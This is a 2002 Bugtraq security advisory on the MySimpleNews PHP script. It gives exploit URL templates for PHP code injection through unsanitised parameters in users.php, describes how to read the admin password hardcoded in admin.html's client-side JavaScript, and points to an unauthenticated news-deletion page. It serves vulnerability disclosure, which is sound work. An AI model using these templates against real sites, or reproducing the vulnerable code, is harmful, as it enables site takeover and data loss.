Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

MySimpleNews (PHP)

From: "Frog Man" <leseulfrog () hotmail com>
Date: Wed, 02 Oct 2002 22:17:53 +0200
Informations :
°°°°°°°°°°°°°°
Language : PHP
Tested version : 1
Website : ?
Comment : Very simple code.


a) Writing PHP code in a PHP file and execution of this code.
Problem :
°°°°°°°°°
----------------- users.php -----------------
 <?
$fp=fopen("news.php3","a");
fwrite($fp,"Posté Par [$LOGIN]\n");
fwrite($fp,"Le $DATA\n<br>");
fwrite($fp,"$MESS\n<hr>");
fclose($fp);
?>
----------------- users.php -----------------

Exploit :
°°°°°°°°°
http://[target]/users.php?LOGIN=[PHP code]
or
http://[target]/users.php?DATA=[PHP code]
or
http://[target]/users.php?MESS=[PHP code]
Execution : http://[target]/news.php3


b) Recovery of admin's password.
Problem :
°°°°°°°°°
------------------ admin.html ------------------
moncode = prompt('MySimpleNews - Administration','');
if (moncode != "[PASSWORD]")
                {
                location.href="about:Erreur 403";
                }
------------------ admin.html ------------------

Exploit :
°°°°°°°°°
view-source:http://[target]/admin.html

c) Deleting news.
Problem :
°°°°°°°°°
No security in the file.

Exploit :
°°°°°°°°°
http://[target]/vider.php3






Patch :
°°°°°°°
Use of htaccess.

More details in french :
http://www.frog-man.org/tutos/MySimpleNews.txt


Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMySimpleNews.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n


_________________________________________________________________
Discutez en ligne avec vos amis ! http://messenger.msn.fr
Previous By Date Next
Previous By Thread Next

Current thread: